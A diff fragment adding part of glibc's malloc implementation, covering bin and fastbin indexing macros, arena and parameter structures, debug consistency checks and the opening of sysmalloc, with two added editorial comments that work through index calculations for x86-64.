+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
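+/*
+  Editorial note (not upstream text): worked examples on a typical
+  x86-64 build, where SIZE_SZ is 8, SMALLBIN_WIDTH is 16 and
+  MIN_LARGE_SIZE is 64 * 16 = 1024:
+
+  bin_index(0x20)  -> smallbin_index: 0x20 >> 4  = 2   (first small bin)
+  bin_index(0x90)  -> smallbin_index: 0x90 >> 4  = 9
+  bin_index(0x3f0) -> smallbin_index: 0x3f0 >> 4 = 63  (last small bin)
+  bin_index(0x400) -> largebin_index_64: 48 + (0x400 >> 6) = 64
+*/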
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
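+
+/*
+  Editorial note (not upstream text): on a typical x86-64 build
+  fastbin_index maps chunk sizes 0x20, 0x30, ... to indices 0, 1, ...
+  (0x20 >> 4 - 2 = 0), and NFASTBINS works out to 10:
+  MAX_FAST_SIZE = 80 * 8 / 4 = 160, request2size(160) = 0xb0,
+  fastbin_index(0xb0) = 9, plus one.  With the default MXFAST only the
+  first seven bins (chunk sizes 0x20-0x80) are actually used.
+*/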
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+  available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debugging is on, it's worth checking them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programming errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum), this only
+         happens for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this were acceptable to somebody, it still cannot solve
+         the problem completely, since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service the request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
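+
+/* sysmalloc obtains memory in one of three ways, all visible below:
+   requests at or above mp_.mmap_threshold (or arriving with no usable
+   arena) are mapped directly with mmap and tagged IS_MMAPPED; for a
+   non-main arena the current sub-heap is grown or a fresh heap is
+   created with new_heap; for the main arena the brk is extended via
+   MORECORE (sbrk), with mmap as a fallback if that fails.  */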
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If we have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
